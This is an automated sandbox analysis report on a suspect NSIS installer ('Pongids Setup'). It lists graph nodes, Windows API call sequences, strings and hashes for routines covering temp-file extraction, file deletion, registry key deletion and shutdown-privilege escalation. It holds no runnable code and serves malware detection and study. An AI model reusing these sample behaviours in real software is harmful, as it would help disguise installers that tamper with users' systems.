5280->5282 5284 403b85 
5281->5284 5285 403b68 SendMessageA IsWindowEnabled 5281->5285 5282->5268 5283->5268 5287 403b92 5284->5287 5288 403bd9 SendMessageA 5284->5288 5289 403ba5 5284->5289 5297 403b8a 5284->5297 5285->5268 5285->5284 5286 405dc2 18 API calls 5286->5294 5287->5288 5287->5297 5288->5280 5292 403bc2 5289->5292 5293 403bad 5289->5293 5290 403f5e SendMessageA 5290->5280 5291 403f85 19 API calls 5291->5294 5296 40140b 2 API calls 5292->5296 5295 40140b 2 API calls 5293->5295 5294->5268 5294->5278 5294->5279 5294->5286 5294->5291 5298 403f85 19 API calls 5294->5298 5313 403e50 DestroyWindow 5294->5313 5295->5297 5296->5297 5297->5280 5297->5290 5299 403d3d GetDlgItem 5298->5299 5300 403d52 5299->5300 5301 403d5a ShowWindow EnableWindow 5299->5301 5300->5301 5322 403fa7 EnableWindow 5301->5322 5303 403d84 EnableWindow 5306 403d98 5303->5306 5304 403d9d GetSystemMenu EnableMenuItem SendMessageA 5305 403dcd SendMessageA 5304->5305 5304->5306 5305->5306 5306->5304 5323 403fba SendMessageA 5306->5323 5324 405da0 lstrcpynA 5306->5324 5309 403dfb lstrlenA 5310 405dc2 18 API calls 5309->5310 5311 403e0c SetWindowTextA 5310->5311 5312 401389 2 API calls 5311->5312 5312->5294 5313->5273 5314 403e6a CreateDialogParamA 5313->5314 5314->5273 5315 403e9d 5314->5315 5316 403f85 19 API calls 5315->5316 5317 403ea8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5316->5317 5318 401389 2 API calls 5317->5318 5319 403eee 5318->5319 5319->5268 5320 403ef6 ShowWindow 5319->5320 5321 403fd1 SendMessageA 5320->5321 5321->5273 5322->5303 5323->5306 5324->5309 5325 401eb3 5326 402ace 18 API calls 5325->5326 5327 401eb9 5326->5327 5328 404fb9 25 API calls 5327->5328 5329 401ec3 5328->5329 5330 405531 2 API calls 5329->5330 5333 401ec9 5330->5333 5331 401f1f CloseHandle 5335 402729 5331->5335 5332 401ee8 WaitForSingleObject 5332->5333 5334 401ef6 GetExitCodeProcess 5332->5334 5333->5331 5333->5332 5333->5335 5336 406175 2 API calls 5333->5336 5337 401f11 5334->5337 5338 401f08 5334->5338 5336->5332 
5337->5331 5340 405cfe wsprintfA 5338->5340 5340->5337 4327 402336 4328 402ace 18 API calls 4327->4328 4329 402347 4328->4329 4330 402ace 18 API calls 4329->4330 4331 402350 4330->4331 4332 402ace 18 API calls 4331->4332 4333 40235a GetPrivateProfileStringA 4332->4333 5341 404936 GetDlgItem GetDlgItem 5342 404988 7 API calls 5341->5342 5348 404ba0 5341->5348 5343 404a2b DeleteObject 5342->5343 5344 404a1e SendMessageA 5342->5344 5345 404a34 5343->5345 5344->5343 5346 404a6b 5345->5346 5347 405dc2 18 API calls 5345->5347 5349 403f85 19 API calls 5346->5349 5351 404a4d SendMessageA SendMessageA 5347->5351 5355 404c84 5348->5355 5358 404884 5 API calls 5348->5358 5378 404c11 5348->5378 5354 404a7f 5349->5354 5350 404d30 5352 404d42 5350->5352 5353 404d3a SendMessageA 5350->5353 5351->5345 5362 404d54 ImageList_Destroy 5352->5362 5363 404d5b 5352->5363 5373 404d6b 5352->5373 5353->5352 5359 403f85 19 API calls 5354->5359 5355->5350 5360 404cdd SendMessageA 5355->5360 5384 404b93 5355->5384 5356 403fec 8 API calls 5361 404f26 5356->5361 5357 404c76 SendMessageA 5357->5355 5358->5378 5379 404a8d 5359->5379 5364 404cf2 SendMessageA 5360->5364 5360->5384 5362->5363 5366 404d64 GlobalFree 5363->5366 5363->5373 5368 404d05 5364->5368 5365 404eda 5369 404eec ShowWindow GetDlgItem ShowWindow 5365->5369 5365->5384 5366->5373 5367 404b61 GetWindowLongA SetWindowLongA 5370 404b7a 5367->5370 5374 404d16 SendMessageA 5368->5374 5369->5384 5371 404b80 ShowWindow 5370->5371 5372 404b98 5370->5372 5392 403fba SendMessageA 5371->5392 5393 403fba SendMessageA 5372->5393 5373->5365 5383 404904 4 API calls 5373->5383 5388 404da6 5373->5388 5374->5350 5375 404b5b 5375->5367 5375->5370 5378->5355 5378->5357 5379->5367 5379->5375 5380 404adc SendMessageA 5379->5380 5381 404b18 SendMessageA 5379->5381 5382 404b29 SendMessageA 5379->5382 5380->5379 5381->5379 5382->5379 5383->5388 5384->5356 5385 404eb0 InvalidateRect 5385->5365 5386 404ec6 5385->5386 5389 40483f 21 API calls 5386->5389 5387 
404dd4 SendMessageA 5391 404dea 5387->5391 5388->5387 5388->5391 5389->5365 5390 404e5e SendMessageA SendMessageA 5390->5391 5391->5385 5391->5390 5392->5384 5393->5348 5394 4014b7 5395 4014bd 5394->5395 5396 401389 2 API calls 5395->5396 5397 4014c5 5396->5397 5398 401b39 5399 402ace 18 API calls 5398->5399 5400 401b40 5399->5400 5401 402aac 18 API calls 5400->5401 5402 401b49 wsprintfA 5401->5402 5403 40295e 5402->5403 5404 402939 SendMessageA 5405 402953 InvalidateRect 5404->5405 5406 40295e 5404->5406 5405->5406 4409 4015bb 4410 402ace 18 API calls 4409->4410 4411 4015c2 4410->4411 4412 4058ab 4 API calls 4411->4412 4425 4015ca 4412->4425 4413 401624 4415 401629 4413->4415 4417 401652 4413->4417 4414 40583d CharNextA 4414->4425 4428 401423 4415->4428 4419 401423 25 API calls 4417->4419 4424 40164a 4419->4424 4421 4054fc 2 API calls 4421->4425 4422 405519 5 API calls 4422->4425 4423 40163b SetCurrentDirectoryA 4423->4424 4425->4413 4425->4414 4425->4421 4425->4422 4426 40160c GetFileAttributesA 4425->4426 4427 40547f 4 API calls 4425->4427 4426->4425 4427->4425 4429 404fb9 25 API calls 4428->4429 4430 401431 4429->4430 4431 405da0 lstrcpynA 4430->4431 4431->4423 5407 4016bb 5408 402ace 18 API calls 5407->5408 5409 4016c1 GetFullPathNameA 5408->5409 5410 4016d8 5409->5410 5416 4016f9 5409->5416 5413 4060a4 2 API calls 5410->5413 5410->5416 5411 40170d GetShortPathNameA 5412 40295e 5411->5412 5414 4016e9 5413->5414 5414->5416 5417 405da0 lstrcpynA 5414->5417 5416->5411 5416->5412 5417->5416 5418 401d3b GetDlgItem GetClientRect 5419 402ace 18 API calls 5418->5419 5420 401d6b LoadImageA SendMessageA 5419->5420 5421 401d89 DeleteObject 5420->5421 5422 40295e 5420->5422 5421->5422

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 004031A5
                                                                            • GetVersion.KERNEL32 ref: 004031AB
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031D4
                                                                            • #17.COMCTL32(00000007,00000009), ref: 004031F6
                                                                            • OleInitialize.OLE32(00000000), ref: 004031FD
                                                                            • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403219
                                                                            • GetCommandLineA.KERNEL32(Pongids Setup,NSIS Error), ref: 0040322E
                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",00000000), ref: 00403241
                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",00000020), ref: 0040326C
                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403369
                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040337A
                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403386
                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339A
                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033A2
                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033B3
                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033BB
                                                                            • DeleteFileA.KERNELBASE(1033), ref: 004033CF
                                                                              • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                              • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                            • OleUninitialize.OLE32(?), ref: 0040347D
                                                                            • ExitProcess.KERNEL32 ref: 0040349E
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004035BB
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004035C2
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035DA
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004035F9
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040361D
                                                                            • ExitProcess.KERNEL32 ref: 00403640
                                                                              • Part of subcall function 00405596: MessageBoxIndirectA.USER32(00409218), ref: 004055F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                            • String ID: "$"C:\Users\user\Desktop\nRNzqQOQwk.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nRNzqQOQwk.exe$C:\Users\user\slavelivets$C:\Users\user\slavelivets$Error launching installer$Low$NSIS Error$Pongids Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K`v$~nsu
                                                                            APIs
                                                                              • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                            • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                            • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                            • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc

                                                                            Control-flow Graph

                                                                            [Figure: control-flow graph of the code starting at 405dc2, with executed and not-executed blocks marked; graph data omitted.]
                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405E73
                                                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405EEE
                                                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F01
                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405F3D
                                                                            • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405F4B
                                                                            • CoTaskMemFree.OLE32(0078FCF8), ref: 00405F56
                                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F78
                                                                            • lstrlenA.KERNEL32(Call,00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405FCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                            Control-flow Graph

                                                                            [Figure: control-flow graph of the code starting at 405642, with executed and not-executed blocks marked; graph data omitted.]
                                                                            APIs
                                                                            • DeleteFileA.KERNELBASE(?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040566B
                                                                            • lstrcatA.KERNEL32(0079F548,\*.*,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056B3
                                                                            • lstrcatA.KERNEL32(?,00409014,?,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D4
                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056DA
                                                                            • FindFirstFileA.KERNEL32(0079F548,?,?,?,00409014,?,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056EB
                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405798
                                                                            • FindClose.KERNEL32(00000000), ref: 004057A9
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564F
                                                                            • \*.*, xrefs: 004056AD
                                                                            • "C:\Users\user\Desktop\nRNzqQOQwk.exe", xrefs: 00405642
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$C:\Users\user\AppData\Local\Temp\$\*.*

                                                                            Control-flow Graph

                                                                            [Figure: control-flow graph of the code starting at 402b0e, with executed and not-executed blocks marked; graph data omitted.]
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402B2F
                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteEnumOpen
                                                                            APIs
                                                                            • FindFirstFileA.KERNELBASE(765F3410,0079FD90,C:\,00405943,C:\,C:\,00000000,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\), ref: 004060AF
                                                                            • FindClose.KERNELBASE(00000000), ref: 004060BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: C:\
                                                                            • API String ID: 2295610775-3404278061
                                                                            • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                            • Instruction ID: 4d264840bddbdcf8954fb0232b098af143b8be61859f100819b52cc90bd9207d
                                                                            • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                            • Instruction Fuzzy Hash: AAD0127595A1205BC71197787C0C84B7A589B053307114A32F46AF22E0D6349C7686E9

                                                                            Control-flow Graph

                                                                            • Control-flow graph (legend: Executed / Not Executed), first block 403720-403738
                                                                            APIs
                                                                              • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                              • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                            • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,765F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nRNzqQOQwk.exe",00000000), ref: 0040379B
                                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\slavelivets,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,765F3410), ref: 00403810
                                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403823
                                                                            • GetFileAttributesA.KERNEL32(Call), ref: 0040382E
                                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\slavelivets), ref: 00403877
                                                                              • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                                            • RegisterClassA.USER32(007A16E0), ref: 004038B4
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038CC
                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403901
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403937
                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 00403963
                                                                            • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 00403970
                                                                            • RegisterClassA.USER32(007A16E0), ref: 00403979
                                                                            • DialogBoxParamA.USER32(?,00000000,00403AB2,00000000), ref: 00403998
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\slavelivets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                            • API String ID: 1975747703-1364596019
                                                                            • Opcode ID: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                            • Instruction ID: 69823c21e20ed545a36681f3e22a73ce5ba8c54c43716b07ce110ef4df70eff0
                                                                            • Opcode Fuzzy Hash: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                            • Instruction Fuzzy Hash: 1361D6B5544240AEE310BF619C45F3B3AACEB85789F40857FF941B22E2D77D9D018A2D

                                                                            Control-flow Graph

                                                                            • Control-flow graph (legend: Executed / Not Executed), first block 402cfa-402d48
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402D0B
                                                                            • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\nRNzqQOQwk.exe,00000400), ref: 00402D27
                                                                              • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00405A17
                                                                              • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                            • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nRNzqQOQwk.exe,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00402D73
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: T$"C:\Users\user\Desktop\nRNzqQOQwk.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nRNzqQOQwk.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`i$soft
                                                                            • API String ID: 4283519449-3998746164
                                                                            • Opcode ID: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                            • Instruction ID: 3261349ff2f4a6e0e52cb66aedc5a428c749111a9fc88119453a55b84fe8b48b
                                                                            • Opcode Fuzzy Hash: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                                            • Instruction Fuzzy Hash: 9A510671940215AFDB119F60DE89B9E7BB8EB44364F20413BF904B62D1D7BC8D408B9D

                                                                            Control-flow Graph

                                                                            • Control-flow graph (legend: Executed / Not Executed), first block 401759-40177c
                                                                            APIs
                                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 00401798
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 004017C2
                                                                              • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Pongids Setup,NSIS Error), ref: 00405DAD
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                              • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                              • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,765F23A0), ref: 00405015
                                                                              • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                              • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp$C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dll$C:\Users\user\slavelivets$Call
                                                                            • API String ID: 1941528284-2519843916
                                                                            • Opcode ID: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                                            • Instruction ID: dbbb128bf7935f0aed0e50e9380fc9841c9442f81e714e1827c6660095eaabca
                                                                            • Opcode Fuzzy Hash: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                                            • Instruction Fuzzy Hash: FE41E772910515BACB107BB5CC49DAF7AB9EF45368B20C23BF121F10E1C77C8A418A6D

                                                                            Control-flow Graph

                                                                            • Control-flow graph (legend: Executed / Not Executed), first block 40547f-4054ca
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                                            • GetLastError.KERNEL32 ref: 004054D6
                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054EB
                                                                            • GetLastError.KERNEL32 ref: 004054F5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                            • API String ID: 3449924974-2230009264
                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                            • Instruction ID: 09fe99030eccae78cb9d2ce19bbf77f9f972de75acbbd1990c032815ad2a971a
                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                            • Instruction Fuzzy Hash: 2F010871D14259EADF119BA4C944BEFBFB8EB14315F00417AE904B6280E378A644CFAA

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401D98
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                            • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Times New Roman
                                                                            • API String ID: 3808545654-927190056
                                                                            • Opcode ID: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                                            • Instruction ID: 37723da549b7de6e047f5ddf6566bf04a0332ae81d9da388354d8b2e576e77f8
                                                                            • Opcode Fuzzy Hash: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                                            • Instruction Fuzzy Hash: 3A015272948340AFE7006B70AE49F9A3FF4AB55315F10847AF241B62E2C6B904569B3E

                                                                            Control-flow Graph

                                                                            control_flow_graph 682 4060cb-4060eb GetSystemDirectoryA 683 4060ed 682->683 684 4060ef-4060f1 682->684 683->684 685 406101-406103 684->685 686 4060f3-4060fb 684->686 687 406104-406136 wsprintfA LoadLibraryExA 685->687 686->685 688 4060fd-4060ff 686->688 688->687
                                                                            APIs
                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                                            • wsprintfA.USER32 ref: 0040611B
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-4240819195
                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                            • Instruction ID: e39d6de12310bdbc02ec2e887020ee50980fcceaee6e7f6f8e64b4e94942106c
                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                            • Instruction Fuzzy Hash: 80F0FC30A40115A6EF1497A4DC0DFEB365CAB08305F140176A547E51D2D5B8E9248B69

                                                                            Control-flow Graph

